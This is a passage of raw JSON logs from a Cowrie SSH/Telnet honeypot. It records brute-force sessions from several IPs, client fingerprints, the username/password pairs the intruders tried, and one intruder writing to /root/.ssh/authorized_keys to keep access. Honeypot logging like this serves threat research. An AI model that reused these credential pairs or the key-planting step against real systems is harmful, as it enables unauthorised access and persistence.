~","sensor":"my-vps","timestamp":"2025-09-09T01:15:35.620683Z","src_ip":"212.227.235.229","session":"bbb9c17d8dc8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:15:35.899083Z","src_ip":"212.227.235.229","session":"bbb9c17d8dc8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:15:35.900112Z","src_ip":"212.227.235.229","session":"bbb9c17d8dc8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38710,"dst_ip":"1.2.3.4","dst_port":22,"session":"a58c10da6e99","protocol":"ssh","message":"New connection: 212.227.235.229:38710 (1.2.3.4:22) [session: a58c10da6e99]","sensor":"my-vps","timestamp":"2025-09-09T01:15:36.148037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:15:36.148919Z","src_ip":"212.227.235.229","session":"a58c10da6e99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:15:36.407334Z","src_ip":"212.227.235.229","session":"a58c10da6e99"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:15:37.487426Z","src_ip":"212.227.235.229","session":"a58c10da6e99"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:15:38.749617Z","src_ip":"212.227.235.229","session":"a58c10da6e99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39386,"dst_ip":"1.2.3.4","dst_port":22,"session":"690d1da196cb","protocol":"ssh","message":"New connection: 212.227.235.229:39386 (1.2.3.4:22) [session: 690d1da196cb]","sensor":"my-vps","timestamp":"2025-09-09T01:15:39.006961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:15:39.007695Z","src_ip":"212.227.235.229","session":"690d1da196cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:15:39.267362Z","src_ip":"212.227.235.229","session":"690d1da196cb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:15:40.362544Z","src_ip":"212.227.235.229","session":"690d1da196cb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:15:40.622730Z","src_ip":"212.227.235.229","session":"690d1da196cb"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:15:40.631546Z","src_ip":"212.227.235.229","session":"bbb9c17d8dc8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58628,"dst_ip":"1.2.3.4","dst_port":23,"session":"693ebe959429","protocol":"telnet","message":"New connection: 212.227.125.160:58628 (1.2.3.4:23) [session: 693ebe959429]","sensor":"my-vps","timestamp":"2025-09-09T01:17:15.444402Z"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":55522,"dst_ip":"1.2.3.4","dst_port":23,"session":"a72196510976","protocol":"telnet","message":"New connection: 176.65.149.186:55522 (1.2.3.4:23) [session: a72196510976]","sensor":"my-vps","timestamp":"2025-09-09T01:17:17.326520Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:17:17.365372Z","src_ip":"176.65.149.186","session":"a72196510976"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:17:17.386180Z","src_ip":"176.65.149.186","session":"a72196510976"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T01:17:17.387194Z","src_ip":"176.65.149.186","session":"a72196510976"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T01:17:17.387990Z","src_ip":"176.65.149.186","session":"a72196510976"}
{"eventid":"cowrie.session.closed","duration":13.136948108673096,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:17:28.581278Z","src_ip":"212.227.125.160","session":"693ebe959429"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57290,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab4f6d52e035","protocol":"ssh","message":"New connection: 217.72.205.35:57290 (1.2.3.4:22) [session: ab4f6d52e035]","sensor":"my-vps","timestamp":"2025-09-09T01:19:18.716399Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:19:18.717689Z","src_ip":"217.72.205.35","session":"ab4f6d52e035"}
{"eventid":"cowrie.session.connect","src_ip":"203.195.82.54","src_port":55384,"dst_ip":"1.2.3.4","dst_port":22,"session":"28ef1d18f660","protocol":"ssh","message":"New connection: 203.195.82.54:55384 (1.2.3.4:22) [session: 28ef1d18f660]","sensor":"my-vps","timestamp":"2025-09-09T01:19:34.385478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T01:19:34.386358Z","src_ip":"203.195.82.54","session":"28ef1d18f660"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T01:19:34.619109Z","src_ip":"203.195.82.54","session":"28ef1d18f660"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:19:42.939570Z","src_ip":"203.195.82.54","session":"28ef1d18f660"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","size":524,"shasum":"1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:20:17.421962Z","src_ip":"176.65.149.186","session":"a72196510976"}
{"eventid":"cowrie.session.closed","duration":180.1003761291504,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:20:17.426827Z","src_ip":"176.65.149.186","session":"a72196510976"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35800,"dst_ip":"1.2.3.4","dst_port":22,"session":"56ef444c57f0","protocol":"ssh","message":"New connection: 212.227.235.229:35800 (1.2.3.4:22) [session: 56ef444c57f0]","sensor":"my-vps","timestamp":"2025-09-09T01:22:09.945378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:22:09.946182Z","src_ip":"212.227.235.229","session":"56ef444c57f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:22:10.212250Z","src_ip":"212.227.235.229","session":"56ef444c57f0"}
{"eventid":"cowrie.login.failed","username":"hunter","password":"Password123","message":"login attempt [hunter/Password123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:22:11.318715Z","src_ip":"212.227.235.229","session":"56ef444c57f0"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:22:12.587250Z","src_ip":"212.227.235.229","session":"56ef444c57f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59960,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a7a61422c55","protocol":"ssh","message":"New connection: 212.227.235.229:59960 (1.2.3.4:22) [session: 0a7a61422c55]","sensor":"my-vps","timestamp":"2025-09-09T01:22:13.905258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:22:13.906211Z","src_ip":"212.227.235.229","session":"0a7a61422c55"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:22:14.148240Z","src_ip":"212.227.235.229","session":"0a7a61422c55"}
{"eventid":"cowrie.login.failed","username":"info","password":"abc123","message":"login attempt [info/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:22:15.163782Z","src_ip":"212.227.235.229","session":"0a7a61422c55"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:22:16.409475Z","src_ip":"212.227.235.229","session":"0a7a61422c55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35664,"dst_ip":"1.2.3.4","dst_port":22,"session":"73c86c47417e","protocol":"ssh","message":"New connection: 212.227.235.229:35664 (1.2.3.4:22) [session: 73c86c47417e]","sensor":"my-vps","timestamp":"2025-09-09T01:22:17.793290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:22:17.794237Z","src_ip":"212.227.235.229","session":"73c86c47417e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:22:17.914496Z","src_ip":"212.227.235.229","session":"73c86c47417e"}
{"eventid":"cowrie.login.failed","username":"service","password":"111111","message":"login attempt [service/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:22:18.435812Z","src_ip":"212.227.235.229","session":"73c86c47417e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:22:19.559721Z","src_ip":"212.227.235.229","session":"73c86c47417e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38484,"dst_ip":"1.2.3.4","dst_port":22,"session":"9651bdb7a273","protocol":"ssh","message":"New connection: 212.227.235.229:38484 (1.2.3.4:22) [session: 9651bdb7a273]","sensor":"my-vps","timestamp":"2025-09-09T01:23:08.027609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:23:08.028678Z","src_ip":"212.227.235.229","session":"9651bdb7a273"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:23:08.338178Z","src_ip":"212.227.235.229","session":"9651bdb7a273"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"Password1","message":"login attempt [postgres/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T01:23:09.576746Z","src_ip":"212.227.235.229","session":"9651bdb7a273"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:23:10.889714Z","src_ip":"212.227.235.229","session":"9651bdb7a273"}
{"eventid":"cowrie.session.connect","src_ip":"54.161.130.12","src_port":32040,"dst_ip":"1.2.3.4","dst_port":22,"session":"7018dd3a13a7","protocol":"ssh","message":"New connection: 54.161.130.12:32040 (1.2.3.4:22) [session: 7018dd3a13a7]","sensor":"my-vps","timestamp":"2025-09-09T01:23:19.063005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T01:23:20.019992Z","src_ip":"54.161.130.12","session":"7018dd3a13a7"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-09-09T01:23:20.020723Z","src_ip":"54.161.130.12","session":"7018dd3a13a7"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:23:22.768522Z","src_ip":"54.161.130.12","session":"7018dd3a13a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46256,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a12957ae1f1","protocol":"ssh","message":"New connection: 212.227.235.229:46256 (1.2.3.4:22) [session: 0a12957ae1f1]","sensor":"my-vps","timestamp":"2025-09-09T01:23:37.162348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:23:37.163204Z","src_ip":"212.227.235.229","session":"0a12957ae1f1"}
